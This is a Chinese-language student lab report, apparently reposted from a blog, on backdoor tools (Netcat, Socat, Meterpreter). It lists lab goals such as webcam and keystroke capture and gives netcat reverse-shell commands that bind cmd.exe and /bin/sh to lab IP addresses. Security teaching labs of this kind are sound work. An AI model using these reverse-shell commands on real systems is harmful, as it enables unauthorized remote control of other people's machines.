Exp2-后门原理与实践
作者:互联网
一、常用后门工具
- 1.Netcat 、Socat系列
- 底层工具,进行基本的TCP、UDP数据收发,常常被与其他工具结合使用,起到后门的作用。
- 在Linux系统中一般自带netcat,使用man nc命令可以查看使用帮助
- 在Windows系统中,需要下载ncat.rar,解压后可使用
- SoCat相当于Netcat++,一个超级Netcat工具。在Windows下可以下载socat.rar,使用README作为参考。任何代理、转发等功能都可以用该工具实现
- 底层工具,进行基本的TCP、UDP数据收发,常常被与其他工具结合使用,起到后门的作用。
- 2.Meterpreter
- 一个用来生成后门程序的程序。
它包含着后门的- 基本功能(基本的连接、执行指令)
- 扩展功能(如搜集用户信息、安装服务等功能)
- 编码模式
- 运行平台
- 运行参数
- 一个用来生成后门程序的程序。
- 3.Intersect
- 4.CHAOS……
本次实验我们主要使用Netcat 、Socat系列以及Meterpreter。
二、实验目标
- 使用netcat获取主机操作Shell,cron启动
- 使用socat获取主机操作Shell,任务计划启动
- 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
- 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
- 使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。
三、实验环境
环境
主机:Windows 10;
靶机:Kali ;
四、实验内容
1.使用netcat获取主机操作Shell,cron启动
- kali获取windows的shell
-
(1) 查看kali虚拟机的IP地址
-
(2)在kali虚拟机中开启监听,端口号以学号为基础指定
nc -l -p 1301
-
(3)windows反弹连接Linux,这里首先在windows下进入ncat所在的文件夹,ip的地址为Linux的地址
ncat.exe -e cmd.exe 192.168.116.132 1301
-
(4)Linux下看到Windows的命令提示,验证shell
-
- 2.Windows获取kali虚拟机的shell
-
(1)获取Windows中的IP地址
-
(2)在ncat文件夹目录下打开监听,端口选择类学号数字
ncat.exe -l -p 1301
-
(3)Linux反弹连接windows
nc 192.168.101.99 1301 -e /bin/sh
-
(4)Windows获得kali的shell,使用linux常用指令验证
-
标签:后门,Shell,kali,Windows,Exp2,实践,获取,主机,ncat 来源: https://www.cnblogs.com/20191301lhq/p/16071588.html